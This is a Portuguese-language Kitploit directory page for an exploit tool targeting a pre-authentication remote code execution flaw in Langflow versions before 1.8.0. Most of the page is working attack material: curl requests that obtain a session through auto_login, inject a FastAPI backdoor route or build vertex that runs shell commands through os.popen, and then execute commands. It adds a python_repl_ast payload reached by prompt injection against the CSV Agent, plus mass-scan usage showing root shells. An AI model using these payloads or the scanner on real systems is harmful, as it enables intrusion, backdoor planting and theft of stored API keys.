Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-27966 — Scanner de RCE pré-autenticação para Langflow < 1.8.0 — Injeção de Rota + Injeção de Vertex → Execução de Código (CVSS 9.8) | Kitploit
Ferramentas/GitHubGitHub/shinthink/cve-2026-27966
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleSegurança de IA
GitHubshinthink/cve-2026-27966

CVE-2026-27966

Scanner de RCE pré-autenticação para Langflow < 1.8.0 — Injeção de Rota + Injeção de Vertex → Execução de Código (CVSS 9.8)

Ver Repositório
23há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-27966 — Scanner de Execução Remota de Código do Langflow

Injeção de Rota Pré-Autenticação + Injeção de Vértice → Execução de Código Python


Visão Geral

CVE-2026-27966 é uma vulnerabilidade de execução remota de código de severidade crítica (CVSS 9.8) pré-autenticação nas versões do Langflow anteriores à 1.8.0. A vulnerabilidade decorre de allow_dangerous_code=True estar embutido no componente CSV Agent, expondo a ferramenta python_repl_ast do LangChain a injeção de prompt não autenticada.

Além disso, vários endpoints da API não possuem autenticação adequada, permitindo injeção direta de rotas e injeção de vértices de fluxo — mesmo em instâncias onde o CSV Agent não está configurado.

Versões Afetadas

Versão do LangflowStatus
< 1.8.0Vulnerável
>= 1.8.0Corrigida

Vetores de Ataque

Este scanner testa três caminhos de exploração distintos:

1. Injeção de Rota (bypass de auto_login)

root@kitploit:~
GET  /api/v1/auto_login          → obtain session / API key
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

2. Injeção Direta de Rota (sem chave de API)

root@kitploit:~
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

3. Injeção de Vértice no Build (build sem autenticação)

root@kitploit:~
GET  /api/v1/flows/basic_examples  → extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices → inject malicious vertex
POST /api/v1/run/{UUID}            → execute vertex code → RCE

Mecanismo da Vulnerabilidade

Causa Raiz

Em src/lfx/src/lfx/components/langchain_utilities/csv_agent.py, o nó do CSV Agent codifica allow_dangerous_code=True, o que expõe automaticamente a ferramenta python_repl_ast do LangChain:

root@kitploit:~
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded — cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)

Isso permite que qualquer prompt que alcance o CSV Agent execute código Python arbitrário por meio de:

root@kitploit:~
Action: python_repl_ast
Action Input: __import__("os").system("command")

Superfície de API Não Autenticada

A API REST do Langflow expõe vários endpoints sem autenticação:

Bypass de Autenticação via auto_login

Em instâncias onde auto_login está habilitado (padrão em muitas implantações Docker), um atacante obtém uma sessão válida e uma chave de API:

root@kitploit:~
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token → full API access

Com uma chave de API válida, o atacante pode usar POST /api/v1/custom_component para registrar uma rota backdoor FastAPI que persiste em memória até o servidor ser reiniciado:

root@kitploit:~
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")

Por que CVSS 9.8


Instalação

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt

Uso

root@kitploit:~
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v

Argumentos

root@kitploit:~
  -t, --target      Single target (IP:port or domain)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-exploit      Detection only, skip RCE attempts
  -v, --verbose     Show all results including non-RCE targets

Prova de Conceito

Detecção e Exploração

root@kitploit:~
$ python cve_2026_27966.py -t target.com:7860 -v
root@kitploit:~
  CVE-2026-27966 — Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection → RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s

Saída da Varredura em Massa

root@kitploit:~
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  192.168.10.50     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] target.internal:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------

Exploração Manual

Passo 1 — Detectar Langflow

root@kitploit:~
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}

Passo 2 — Extrair UUIDs de fluxo

root@kitploit:~
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"

Passo 3 — Injetar vértice backdoor

root@kitploit:~
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\[email protected](\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'

Passo 4 — Executar comando

root@kitploit:~
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'

Impacto

A exploração bem-sucedida resulta em execução remota de código como root no contêiner Docker do Langflow. A partir daí, um atacante pode:

  • Extrair chaves de API do banco de dados SQLite do Langflow (OpenAI, Anthropic, Gemini, etc.)
  • Acessar bancos de dados vetoriais conectados e serviços externos
  • Implantar backdoors persistentes por meio de componentes personalizados
  • Fazer pivô para redes internas
  • Implantar mineradores de criptomoedas ou infraestrutura de C2

Aviso Legal

APENAS PARA FINS EDUCACIONAIS E DE TESTE AUTORIZADO.

Este software é destinado a profissionais de segurança que realizam testes de penetração autorizados, organizações que auditam sua própria infraestrutura e pesquisadores que estudam exploração de vulnerabilidades.

O acesso não autorizado a sistemas computacionais é ilegal e pode violar:

  • Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonésia: UU ITE Pasal 30 & 46
  • União Europeia: Diretiva 2013/40/EU
  • Reino Unido: Computer Misuse Act 1990

Os autores não assumem responsabilidade por uso indevido. Ao usar este software, você aceita total responsabilidade por suas ações.


Referências

Recurso

Este projeto não é afiliado ao Langflow nem à Logspace.

Baixar ferramenta
EndpointAutenticaçãoDados Expostos
GET /api/v1/versionNenhumaVersão do Langflow
GET /api/v1/healthNenhumaStatus da instância
GET /api/v1/flows/basic_examples/Nenhuma26 UUIDs de fluxos de exemplo + estrutura
POST /api/v1/build/{uuid}/verticesNenhumaAceita injeção arbitrária de código
POST /api/v1/users/NenhumaCriação de usuários (inativa)
GET /openapi.jsonNenhumaDocumentação completa da API
MétricaValor
Vetor de AtaqueRede (remoto)
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
EscopoInalterado
ConfidencialidadeAlta
IntegridadeAlta
DisponibilidadeAlta
Link
Advisory do GitHubGHSA-3645-fxcv-hqr4
Commit de Correçãod8c6480d
Módulo MetasploitRapid7
Entrada no NVDCVE-2026-27966